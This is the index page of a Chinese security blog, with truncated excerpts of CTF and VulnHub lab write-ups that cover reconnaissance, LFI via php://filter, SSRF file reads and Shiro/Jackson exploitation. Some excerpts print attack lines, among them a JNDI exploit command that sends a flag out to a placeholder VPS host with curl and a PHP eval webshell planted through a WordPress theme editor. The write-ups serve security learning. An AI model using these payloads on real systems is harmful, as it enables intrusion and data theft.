晴川's Blog🌈

打靶-Moneybox前言靶场下载：http://www.vulnhub.com/entry/moneybox-1,653/#download靶机和攻击机均为桥连模式 ip网段在192.168.31.0/24下 渗透过程1arp-scan -l 扫主机 扫描开放端口 1nmap -sV 192.168.31.8 -A 发现开放了21 22 80端口，且21端口利用anonymous可以登陆 登陆之后只有一张图片 1get trytofind.jpg 查看了也没啥 1gwenview trytofind.jpg 访问80端口，啥也没有 扫目录 源代码里藏东西了 1<!--the hint is the another secret directory is S3cr3t-T3xt--> 提示在另一个秘密字典里S3cr3t-T3xt 拿到一个key Secret Key 3xtr4ctd4t4 猜测应该和图片有关， 1steghide extract -sf trytofind.jpg 123456Hello..... renu ...

打靶记录-Vegeta前言靶场难度：简单 环境：Virtualbox搭建 结果：取得 root 权限 + Flag 目标机和攻击机均为桥接模式 渗透过程信息搜集 1arp-scan -l 扫到目标机器ip地址为192.168.31.135 扫描开放端口 1nmap -sV -A 192.168.31.135 可以看到开放了22 和80端口 访问看看 1wegt http://192.168.31.135/vegeta1.jpg 下载图片下来，010并没发现什么 目录爆破 扫描一下目录 1python3 -u http://192.168.31.135 在img里发现一张图片 看了看没啥东西，试试 1robots.txt 里面有个find_me， 访问，源代码发现串base64 赛博厨子解密得到一个二维码 得到Password : topshellv 尝试连接ssh连接失败， 到这线索就断了，很懊恼，尝试更大的字典扫描目录 1python3 dirsearch.py -r -u http://192.168.31.135/ -w /usr/share/SecList ...

打靶-Wakan_1前言靶机名称：Wakanda-1 下载地址：https://download.vulnhub.com/wakanda/wakanda-1.ova 操作系统：debian 渗透目标：获取root权限，取得三个flag 渗透过程扫到靶机ip 1arp-scan -l 扫描开放端口 1nmap -sV 192.168.31.124 -A 开放了 80 111和3333端口 3333端口还是个ssh 目录扫描一下 访问一下80 源代码发现 可以控制lang得知控制语言?lang=fr会变成法语 文件读取 1?lang=php://filter/convert.base64-encode/resource=index 得到源码 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071<?php$password ="Niamey4E ...

[红明谷CTF 2021]JavaWeb前言一个shiro的cve 漏洞复现题目描述让访问/login,访问后又让访问/json，但访问有跳转回/login 传点东西进去发现有rememberMe=deleteMe 是个shiro，需要用到CVE-2020-11989（Apache Shiro 身份验证绕过漏洞） 一点注意的地方 springboot对浏览器的请求返回html的报错信息，而对其他客户端返回json格式报错信息，json格式的报错信息更加详细 刚开始就是没注意请求头中Accept，修改为*/*，表示接收所有格式的相响应，这样得到更多的信息 jackson反序列化 利用工具https://github.com/welk1n/JNDI-Injection-Exploit/releases 1java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 'curl http://VPS:7001 -File=@/flag' -A "VPS&quo ...

[RoarCTF 2019]Easy Java前言好久没搞java，真的好烦，java我真的学不下去，觉得好抽象呜呜呜 马上国赛半决赛了，刚考完4级有些焦虑了，真的该安下心好好学习了。。。。 题目复现前置知识WEB-INF/web.xml泄露 WEB-INF是Java的WEB应用的安全目录。如果想在页面中直接访问其中的文件，必须通过web.xml文件对要访问的文件进行相应映射才能访问。WEB-INF主要包含一下文件或目录： /WEB-INF/web.xml：Web应用程序配置文件，描述了 servlet 和其他的应用组件配置及命名规则。 /WEB-INF/classes/：含了站点所有用的 class 文件，包括 servlet class 和非servlet class，他们不能包含在 .jar文件中 /WEB-INF/lib/：存放web应用需要的各种JAR文件，放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件 /WEB-INF/src/：源码 ...

#[VNCTF2022公开赛]easyJava[复现] 前言今天第二道Java题了，加油 提示有/file?并且please input a url 利用上一题的文件泄露，读取WEB-INF/web.xml 发现读取失败了，嗯？ 猜测应该是路径有问题 是tomcat 发现可以这样读 1file:///etc/passwd 后面了解的应该这么读 1234/file?url=file:///usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml/file?url=file:///usr/local/tomcat/webapps/ROOT/WEB-INF/classes这里官方给了另外一个协议netdoc，跟file用法是一样的，但是这个netdoc协议在jdk9以后就不能用了file?url=netdoc:///usr/local/tomcat/webapps/ROOT/WEB-INF 后面把class文件读出来反编译 1234567891011file?url=netdoc:///usr/local/tomcat/webapp ...

22网鼎杯半决赛复现flag01先扫扫端口 wordpress 用插件扫扫看 1wpscan --url http://39.98.116.212/ 没扫到 针对wordpress可以看看后台 /wp-admin 弱口令admin/123456登录成功 上次打vulnhub遇到过一个 404页面是php, 编辑404页面可以上马 直接给整个文件换成 12http://121.89.200.15/wp-admin/theme-editor.php?file=404.php&theme=twentytwentyone<?php eval($_POST['a']);?> 蚁剑链接 1http://121.89.200.15/wp-content/themes/twentytwentyone/404.php ​ flag01: flag{b3482467-f47e-439e-98b9-48269a97dfe3} flag02上传fscan frp 查看ip 1./fscan -h 172.22.15.1/24 ...

第一次打靶机-y0usef前言靶机下载地址：y0usef: 1 ~ VulnHub 靶场难度：简单 环境：Virtualbox搭建 结果：拿到两个权限的flag。 Virtualbox：192.168.31.63（桥接模式） 渗透过程查询当前网段的机器 1arp-scan -l 12arp-scan -lnmap -sP 192.168.31.0/24 | grep -B 2 -A 0 "VirtualBox" 两个都可以 扫到目标主机 之后,扫描一下，开放端口（默认0-1000 1nmap -sV -A 192.168.31.63 发现开放了22和80端口 访问80端口没有什么 继续查看有没有什么web指纹 1whatweb http://192.168.31.63 后面进行目录爆破 1python3 dirsearch.py -u http://192.168.31.53 发现存在adminstration访问尝试 发现被禁止访问 burp抓包 猜测他会对请求头的地址有过滤，这里用xff绕过 改了请求头以后发现访问成200了 发包 ...

准备环境 jdk: 为了离线做准备，最后提前下载好Oracle Java 8/11/17这几个主流版本 反编译工具: cfr-0.152.jar 反编译jar文件环境说明 JAVA_HOME:~/java/jdk1.8.0_181/ decompile.sh脚本，用于class转换成java文件。 1234567891011121314#!/bin/bash# 设置CFR JAR文件的路径CFR_JAR="./DocToolkit-0.0.1-SNAPSHOT.jar"# 设置class文件的根目录CLASS_ROOT="src/main/java"# 查找所有的class文件并反编译为java文件find $CLASS_ROOT -name "*.class" | while read class_file; do # 获取class文件的目录和文件名 class_dir=$(dirname "$class_file") class_ ...

83433ea486119d7dc207c4e82ca6353e603096fef91319226ffc19cdf43e5e8aa2cc7061c89eeb4f57d4fd2bf3e0e2c32b288811e44fb6db55ad43e8301c07d49c9ac761930a0b8dca51bca3fc04b05733486c02f6a44a660cc7df530a3708b2402be33928c131202ee8a551f70dbc53ec65de61c8e8c230c97aba88f788f8b79f30ff2e4b14a0257722b757dee54c8ef065a02fac2bd5f546cca9ed9851d6a33d48e2d37aa13172b811671d02a7774552d1703e20b35d6245ffbdd785675d7897ee0536a39cca6b70a5700256854487d78c352990d3b15d8bdbb6d6a7d020b02f8c18f0d22d860a9533fd2b22fdb6bfc9c3c46a69c654c9e ...